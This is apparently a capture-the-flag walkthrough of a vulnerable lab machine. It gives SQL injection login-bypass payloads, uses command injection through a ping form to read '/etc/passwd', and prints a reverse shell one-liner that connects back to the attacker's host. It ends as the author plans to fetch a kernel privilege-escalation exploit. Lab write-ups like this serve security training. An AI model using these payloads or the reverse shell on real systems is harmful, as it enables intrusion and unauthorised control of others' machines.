OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 57.85 seconds

So the very first thing I taught of after trying all this is to find any exploitable version. CUP 1.1 have PUT method allowed and I tried to poke around it…I got nothing. The next thing I did is see the website running on port 80.Looks like that:

As you can see in the screenshot I tried SQL Injection on the username and password. In my case ‘–‘ these comment doesnot work with the username but ‘#’ works and also SQL injection:

-> ‘or’a’=’a

works like a charm.

username: ‘or’a’=’a

password: ‘or’a’=’a

or

username: admin’ #

password: *blank*

-> Try pinging some IP and see the response. Here PHP Code Injection could occur. We can directly inject the OS commands in a stacked manner and see the output. && , ; can help us stack commands, | is called pipe and is used when we need to feed the output of one command to the input of the other but for now it is not required.

-> We can try out commands such as

whoami

uname

hostname

cat /etc/passwd

lsb_release

uname -r

-> for now lets try to open an interactive bash and connect it to our machine for better view. Write the following command on the ping input box and before doing that open a listener on your machine on any port [in my case its 4444]

->Listen on kali:

->192.168.0.1 && bash -i >& /dev/tcp/192.168.0.106/4444 0>&1

192.168.0.106 is my kali machine and a netcat is listening on that machine

Once you submit this, the page that opens up stays busy and we will be notify by netcat that we got the bash

Now this command shell is no different from the one we have been using on the web but it got a better view. If you write the command whoami, you will get a response apache that simply means that we are not root and we had the limitations of a apache user. So to get over this we need to find a vulnerability in the system internally or through any port to get our privilege escalated. So after looking around a bit, I checked the kernel version

A little search on kernel 2.6.9 will give you exploit:

Lets download this exploit but we are not allowed to write any directory other then tmp. So lets download the exploit at /tmp/ directory and run it from there.